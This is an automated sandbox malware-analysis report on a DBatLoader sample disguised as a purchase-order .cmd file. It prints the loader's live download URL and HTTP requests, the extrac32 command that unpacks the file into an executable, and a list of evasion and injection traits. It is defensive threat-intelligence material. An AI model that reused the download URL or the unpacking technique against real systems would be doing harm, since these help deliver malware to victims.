Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#5_tower_Dec162024.cmd

Overview

General Information

Sample name:PO#5_tower_Dec162024.cmd
Analysis ID:1582694
MD5:8ed519b7621506144f41033597388708
SHA1:d1977995223392fb0d25a7c322d5da9e1157a568
SHA256:b6f2833f88b702a8aba52760c0b55d799cda729a773172188abbf29a29da0f08
Tags:cmduser-abuse_ch
Infos:

Detection

DBatLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
Allocates many large memory junks
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7564 cmdline: extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 6C1C692B2DE02C5CE02A5D2D27117851)
      • WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"Download Url": ["https://gxe0.com/yak2/228_Dlwloedmcwb"]}
SourceRuleDescriptionAuthorStrings
PO#5_tower_Dec162024.cmdJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\x.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000003.1592457768.000000007F700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        00000004.00000002.1593974341.00000000022C7000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000004.00000003.1414129618.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            00000004.00000003.1413414951.000000007FD80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              00000004.00000000.1411291204.0000000000401000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                SourceRuleDescriptionAuthorStrings
                4.2.x.exe.2b80000.1.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  4.0.x.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-31T09:44:13.766542+010020283713Unknown Traffic192.168.2.849707198.252.105.91443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: PO#5_tower_Dec162024.cmdMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/228_Dlwloedmcwb"]}
                    Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 50%
                    Source: PO#5_tower_Dec162024.cmdReversingLabs: Detection: 39%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49707 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02B858B4

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: https://gxe0.com/yak2/228_Dlwloedmcwb
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9E2F8 InternetCheckConnectionA,4_2_02B9E2F8
                    Source: Joe Sandbox ViewIP Address: 198.252.105.91 198.252.105.91
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 198.252.105.91:443
                    Source: global trafficHTTP traffic detected: GET /yak2/228_Dlwloedmcwb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /yak2/228_Dlwloedmcwb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: global trafficDNS traffic detected: DNS query: gxe0.com
                    Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                    Source: x.exe, 00000004.00000002.1593176423.0000000000733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                    Source: x.exe, 00000004.00000002.1611343885.0000000020ACD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/228_Dlwloe
                    Source: x.exe, 00000004.00000002.1611343885.0000000020ADC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwb
                    Source: x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwb7z
                    Source: x.exe, 00000004.00000002.1593176423.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwb?
                    Source: x.exe, 00000004.00000002.1593176423.0000000000700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwbxell
                    Source: x.exe, 00000004.00000002.1593176423.000000000073D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/228_Dlwloedmcwb
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49707 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02B9DBB0
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B97D00 NtWriteVirtualMemory,4_2_02B97D00
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,4_2_02B9DACC
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,4_2_02B9DA44
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B98BB0 GetThreadContext,SetThreadContext,NtResumeThread,4_2_02B98BB0
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B98BAE GetThreadContext,SetThreadContext,NtResumeThread,4_2_02B98BAE
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,4_2_02B9D9F0
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,4_2_02B9EC74
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B820C44_2_02B820C4
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B846A4 appears 244 times
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B844D0 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B98824 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B987A0 appears 54 times
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B844AC appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B8480C appears 931 times
                    Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168
                    Source: classification engineClassification label: mal88.troj.evad.winCMD@7/6@2/1
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B87F5A GetDiskFreeSpaceA,4_2_02B87F5A
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B96D50 CoCreateInstance,4_2_02B96D50
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB07564.TMPJump to behavior
                    Source: Yara matchFile source: PO#5_tower_Dec162024.cmd, type: SAMPLE
                    Source: Yara matchFile source: 4.0.x.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.1592457768.000000007F700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.1411291204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PO#5_tower_Dec162024.cmdReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                    Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 4.2.x.exe.2b80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.1593974341.00000000022C7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.1414129618.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.1413414951.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B987A0
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B832FC push eax; ret 4_2_02B83338
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02BAC2FC push 02BAC367h; ret 4_2_02BAC35F
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8635A push 02B863B7h; ret 4_2_02B863AF
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8635C push 02B863B7h; ret 4_2_02B863AF
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02BAC0AC push 02BAC125h; ret 4_2_02BAC11D
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02BAC1F8 push 02BAC288h; ret 4_2_02BAC280
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02BAC144 push 02BAC1ECh; ret 4_2_02BAC1E4
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B986C0 push 02B98702h; ret 4_2_02B986FA
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8673E push 02B86782h; ret 4_2_02B8677A
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B86740 push 02B86782h; ret 4_2_02B8677A
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8C4F4 push ecx; mov dword ptr [esp], edx4_2_02B8C4F9
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9E5B4 push ecx; mov dword ptr [esp], edx4_2_02B9E5B9
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8D528 push 02B8D554h; ret 4_2_02B8D54C
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8CB74 push 02B8CCFAh; ret 4_2_02B8CCF2
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02BABB6C push 02BABD94h; ret 4_2_02BABD8C
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8CB56 push 02B8CCFAh; ret 4_2_02B8CCF2
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B97894 push 02B97911h; ret 4_2_02B97909
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B968D0 push 02B9697Bh; ret 4_2_02B96973
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B968CE push 02B9697Bh; ret 4_2_02B96973
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9A920 push 02B9A958h; ret 4_2_02B9A950
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B98918 push 02B98950h; ret 4_2_02B98948
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9A91F push 02B9A958h; ret 4_2_02B9A950
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B98916 push 02B98950h; ret 4_2_02B98948
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B92EE8 push 02B92F5Eh; ret 4_2_02B92F56
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B95E04 push ecx; mov dword ptr [esp], edx4_2_02B95E06
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B92FF3 push 02B93041h; ret 4_2_02B93039
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B92FF4 push 02B93041h; ret 4_2_02B93039
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02B9A95C
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
